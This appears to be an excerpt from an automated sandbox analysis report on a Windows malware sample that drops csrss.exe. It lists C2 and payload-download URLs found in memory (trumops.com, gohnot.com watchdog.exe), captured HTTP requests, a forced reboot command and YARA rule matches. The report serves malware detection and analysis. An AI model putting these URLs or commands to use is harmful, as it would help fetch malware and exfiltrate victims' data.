            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
            Source: csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
            Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.381033593.000000001694A000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e
            Source: csrss.exe, 00000011.00000002.560620268.0000000016956000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exe
            Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeH
            Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2ec
            Source: csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://help.ya
            Source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
            Source: csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
            Source: csrss.exeString found in binary or memory: http://search.msn.com/msnb
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
            Source: csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
            Source: csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
            Source: csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
            Source: svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: csrss.exeString found in binary or memory: http://www.bloglines.com)F
            Source: csrss.exeString found in binary or memory: http://www.everyfeed.c
            Source: csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
            Source: csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)tls:
            Source: csrss.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
            Source: csrss.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
            Source: csrss.exeString found in binary or memory: http://www.spidersoft.com)Wget/1.9
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.80
            Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: csrss.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
            Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://retoti.comidentifier
            Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log
            Source: csrss.exe, 00000011.00000003.381724707.00000000168AC000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com
            Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com
            Source: csrss.exe, 00000011.00000002.560620268.0000000016956000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f
            Source: csrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com/api/poll
            Source: csrss.exe, 00000011.00000002.560072123.00000000168E6000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com/api/poll62
            Source: csrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com/api/pollserver3.trumops.com
            Source: csrss.exe, 00000011.00000003.380949672.0000000016964000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f
            Source: csrss.exe, 00000011.00000002.560806655.00000000169E8000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.com
            Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcp
            Source: csrss.exe, 00000011.00000003.380425564.00000000169E8000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.com
            Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.379621696.0000000016A86000.00000004.00000001.sdmpString found in binary or memory: https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comT
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://sitescore.aiValue
            Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000008.00000003.312103721.00000168B0C41000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen.virtua
            Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559317775.0000000016838000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com
            Source: csrss.exeString found in binary or memory: https://trumops.com/api/install-failureinvalid
            Source: 1dyvctHqv1.exe, 00000000.00000002.302703514.00000000160BA000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
            Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.com
            Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
            Source: csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:
            Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332244873.0000000016058000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412239285.00000000168D0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421820882.0000000016858000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.421014108.0000000016814000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
            Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
            Source: unknownDNS traffic detected: queries for: trumops.com
            Source: global trafficHTTP traffic detected: GET /api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1Host: server3.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /546468561c5f48a95f3eb178d8283c2e/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 3633e481-2f88-4842-b7ba-c5d7e0cc011fVersion: 183Accept-Encoding: gzip
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:35:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vGS1xEh6LbXXdYk%2FUfHE3K9XHXOXdwE2lHJOtvHYtcyT5%2B9kHA7Kf8RkH5w6ASVjA0fcvzY3WJWPHRIBYbMyJfOmx%2B%2B35yaFyw7TA7MtjOV6VQ0xWJeJ4Ed3IWRwWuyLAm82%2ByYm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f6ca9af1e660-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:35:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=4vldu1scrrpcspdhkuu3ka9fnh; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2FSRTvKYrEtJCgQJudOl4mEoCl42VZ21LylxF13UV71mdnMd%2Faol5Yp5pxSj%2BswODdLCYMP3eIVPFa9sl85XFuj0UouYrZCuOS%2F8WKEjt3rSe9oezdyQjMbllAbT3Q1v10BSBKd1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f6fbaafd743b-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:37:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=6afjhtvjo4rm2efnl9dt7t1rk1; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YMbRGgJ2bGzGIGIXFb6v9e0wG%2BKBDHlgxtgTlLO5TOltDXIejwxR2ouZvDu5%2Fv1UgpfK778TuEaeYtjU0gQYezCTHP9oV9kTVjAZlULy%2BV9gDKFrggPJhGhvlZQtlD%2FEDY7zfduX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f90c5a1b779d-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
            Source: unknownHTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

            System Summary:

            barindex
            Uses shutdown.exe to shutdown or reboot the systemShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384
            Source: 1dyvctHqv1.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 1dyvctHqv1.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: csrss.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: csrss.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
            Source: 1dyvctHqv1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 52.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.2.1dyvctHqv1.exe.9a56e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.1dyvctHqv1.exe.9ab080.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
